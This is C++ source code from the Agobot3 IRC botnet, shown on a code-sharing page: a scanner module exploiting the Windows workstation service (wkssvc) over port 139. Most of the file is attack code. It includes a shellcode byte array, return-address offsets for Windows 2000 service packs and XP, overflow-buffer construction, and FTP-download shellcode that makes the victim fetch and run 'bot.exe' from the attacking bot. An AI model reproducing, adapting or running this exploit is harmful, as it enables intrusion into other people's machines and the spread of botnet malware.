📄 wksscanner.cpp.svn-base
字号:
/* Agobot3 - a modular IRC bot for Win32 / Linux Copyright (c) 2003 Ago All rights reserved. This is private software, you may redistribute it under the terms of the APL(Ago's Private License) which follows: Redistribution and use in binary forms, with or without modification, are permitted provided that the following conditions are met: 1. The name of the author may not be used to endorse or promote products derived from this software without specific prior written permission. 2. The binary may not be sold and/or given away for free. 3. The licensee may only create binaries for his own usage, not for any third parties. Redistribution and use in source forms, with or without modification, are not permitted. THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */#include "main.h"#include "mainctrl.h"#include "utility.h"#include "shellcode.h"#ifdef WIN32class CScannerWKS : public CScannerBase
{
public:
CScannerWKS();
virtual ~CScannerWKS() throw() { }
bool Exploit();
};
#define WKS_ALIGN 1 // Alignment of eip in buffer#define WKS_RET_SIZE 2026 // How much bytes to overwrite with new eip#define WKS_SC_OFFSET 20 // Start shell code after this much bytes#define NET_API_FUNCTION __stdcall // Hrrmmm, is this really neccessary ?
char wks_shellcode[]= "\xE9\x6F\x00\x00\x00\x5B\xE8\x40\x01\x00\x00\x8D\xB3\x04\x00" "\x00\x00\x8D\xBB\x0D\x00\x00\x00\xC7\x83\x6A\x00\x00\x00\x0F\x00" "\x00\x00\xE8\xCD\x00\x00\x00\x89\x83\x3C\x00\x00\x00\x8D\xBB\x1C" "\x00\x00\x00\xC7\x83\x6A\x00\x00\x00\x0D\x00\x00\x00\xE8\xB2\x00" "\x00\x00\x89\x83\x38\x00\x00\x00\x8D\xBB\x29\x00\x00\x00\xE8\x95" "\x00\x00\x00\x89\x83\x34\x00\x00\x00\x8D\xB3\x40\x00\x00\x00\x8D" "\xBB\x47\x00\x00\x00\xE8\x7E\x00\x00\x00\x89\x83\x4E\x00\x00\x00" "\xE8\x24\x01\x00\x00\xE8\x8C\xFF\xFF\xFF\x00\x00\x00\x00\x6B\x65" "\x72\x6E\x65\x6C\x33\x32\x00\x47\x65\x74\x50\x72\x6F\x63\x41\x64" "\x64\x72\x65\x73\x73\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72" "\x79\x41\x00\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6D\x73\x76\x63\x72\x74" "\x00\x73\x79\x73\x74\x65\x6D\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x56\xFF\x53\x38\x89\xC1\x57\x51" "\xFF\x53\x3C\xC3\x31\xC0\x89\x43\x66\x8B\x53\x66\x3B\x53\x56\x7D" "\x48\x42\x89\x53\x66\x31\xC0\x8B\x43\x66\xC1\xE0\x02\x8B\x4B\x5E" "\x01\xC1\x8B\x01\x03\x43\x52\x57\x56\x51\x89\xFE\x89\xC7\x8B\x4B" "\x6A\xF3\xA6\x59\x5E\x5F\x75\xD1\x31\xC0\x8B\x43\x66\xD1\xE0\x8B" "\x4B\x62\x01\xC1\x31\xC0\x66\x8B\x01\xC1\xE0\x02\x8B\x4B\x5A\x01" "\xC8\x8B\x08\x03\x4B\x52\x89\xC8\xC3\x31\xC0\xC3\x64\xA1\x30\x00" "\x00\x00\x3E\x8B\x40\x0C\x3E\x8B\x70\x1C\xAD\x3E\x8B\x68\x08\x89" "\x6B\x52\x89\xE8\x05\x3C\x00\x00\x00\x8B\x08\x03\x4B\x52\x81\xC1" "\x78\x00\x00\x00\x8B\x31\x03\x73\x52\x81\xC6\x18\x00\x00\x00\xAD" "\x89\x43\x56\xAD\x03\x43\x52\x89\x43\x5A\xAD\x03\x43\x52\x89\x43" "\x5E\xAD\x03\x43\x52\x89\x43\x62\xC3\xE9\x13\x00\x00\x00\x59\x8D" "\x91\x04\x00\x00\x00\x52\xFF\x53\x4E\x68\x00\x00\x00\x00\xFF\x53" "\x34\xE8\xE8\xFF\xFF\xFF\x00\x00\x00\x00\x00";
// :( /me likes unsigned longDWORD dwJMPESP=0x7518A747;
//DWORD dwJMPESP=0x77D71CFC;
/* unsigned long wks_my_offsets[]={ 0x77E14C29, // Win2K SP4 0x77E3CB4C, // Win2K SP1 0x77E42C75, // Win2K SP4 0x41424344 }; // Debug Target
*/
unsigned long wks_my_offsets[]=
{ 0x77E14C29, // Win2K SP4
0x77E3CB4C, // Win2K SP1
0x77E42C75, // Win2K SP4
0x77E3C256, // Win2K SP4 - PhaTTy JMP ESP user32.dll
0x77E2AFC5, // Win2K SP3 - PhaTTy JMP ESP user32.dll
// 0x77E388A7, // Win2K SP3 - PhaTTy JMP ESP user32.dll
0x77E2492B, // Win2K SP2 - PhaTTy JMP ESP user32.dll
// 0x77E3AF64, // Win2K SP2 - PhaTTy JMP ESP user32.dll
0x77E4FF15, // Win2K SP1 - PhaTTy JMP ESP user32.dll
0x77E33F4D // Win2K SP0 - PhaTTy JMP ESP user32.dll
// 0x77E5324B, // Win2K SP1 - PhaTTy JMP ESP user32.dll
};
/* SP0 & SP1: 0x78011324 SP2: 0x78024e02 SP3: 0x77e822ea SP4: 0x7c4fedbb*//* Workstation Scanner starts here scans for wkssvc exploit*/typedef int (__stdcall *MyNVN)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, ULONG);
typedef int (__stdcall *MyNAACN)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, ULONG);
CScannerWKS::CScannerWKS() { m_szType="CScannerWKS"; m_sScannerName.Assign("WKS"); }
bool CScannerWKS::Exploit() { int iRet=0, iShellSize=0, iOffset=2; char szBuffer[3300], szShellBuf[2048];
wchar_t wszBuffer[6600];
NETRESOURCE netResource; bool bRetVal=false; HINSTANCE hInstance;
MyNVN procAddressNVN; MyNAACN procAddressNAACN; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
if(iHostOS==OS_WINNT) return false;
hInstance=LoadLibrary("netapi32"); if(!hInstance) return false;
if(iHostOS!=OS_WINXP) {
procAddressNVN=(MyNVN)GetProcAddress(hInstance, "NetValidateName");
if(!procAddressNVN) { FreeLibrary(hInstance); return false; }
procAddressNAACN=NULL;
} else {
procAddressNAACN=(MyNAACN)GetProcAddress(hInstance, "NetAddAlternateComputerName");
if(!procAddressNAACN) { FreeLibrary(hInstance); return false; }
procAddressNVN=NULL;
} netResource.lpLocalName=NULL; netResource.lpProvider=NULL; netResource.dwType=RESOURCETYPE_ANY; netResource.lpRemoteName=(char*)malloc(strlen(m_sSocket.m_szHost)+4096); sprintf(netResource.lpRemoteName, "\\\\%s\\ipc$", m_sSocket.m_szHost); while(true) { iRet=WNetAddConnection2(&netResource, "", "", 0); if(iRet!=NERR_Success && iRet!=ERROR_SESSION_CREDENTIAL_CONFLICT) break; if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) break; CString sHostNonConst(g_pMainCtrl->m_cIRC.m_sLocalIp); iShellSize=setup_shellcode_ftp(wks_shellcode, sizeof(wks_shellcode), \ szShellBuf, sizeof(szShellBuf), sHostNonConst.Str(), g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue, "bot.exe", "bla", "bla", NULL); memset(szBuffer, 0x90, sizeof(szBuffer));
if(iHostOS!=OS_WINXP) {
char *pBuff=szBuffer+WKS_ALIGN;
for(int i=0; i<WKS_RET_SIZE; i+=4) {
*((unsigned long*)pBuff)=wks_my_offsets[iOffset];
pBuff+=4; }
pBuff=szBuffer+WKS_RET_SIZE+WKS_SC_OFFSET;
if(sizeof(szBuffer)<WKS_RET_SIZE+WKS_SC_OFFSET+iShellSize) break;
memcpy(pBuff, szShellBuf, iShellSize);
} else {
memcpy(szBuffer+2044, &dwJMPESP, 4);
memset(szBuffer+2048, 0x90, 16);
memcpy(szBuffer+2064, szShellBuf, strlen(szShellBuf));
memset(wszBuffer, 0x00, sizeof(wszBuffer));
for (int x=0, i=0; x<=strlen(szBuffer); x++, i+=2) {
wszBuffer[i]=(unsigned short)szBuffer[x];
}
// MultiByteToWideChar(CP_ACP, NULL, szBuffer, sizeof(szBuffer), (unsigned short *)wszBuffer,sizeof(wszBuffer));
} char szTemp[8192]; sprintf(szTemp, "\\\\%s", m_sSocket.m_szHost); wchar_t wszTemp[8192]; MultiByteToWideChar(CP_ACP, 0, szTemp, strlen(szTemp)+1, wszTemp, (int)sizeof(wszTemp)/(int)sizeof(wszTemp[0]));/* if(iHostOS!=OS_WINXP) {
iRet=NetValidateName(wszTemp, (unsigned short*)szBuffer, NULL, NULL, NetSetupUnknown);
} else {
iRet=(procAddressNAACN)(wszTemp,(unsigned short *)wszBuffer, NULL, NULL, NetSetupUnknown);
}*/ bRetVal=true; WNetCancelConnection2(netResource.lpRemoteName, 0, true); break; } if(netResource.lpRemoteName) free(netResource.lpRemoteName);
FreeLibrary(hInstance); return bRetVal;}REGSCANNER(WKS_139, WKS, 139, true, true)
#endif // WIN32
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -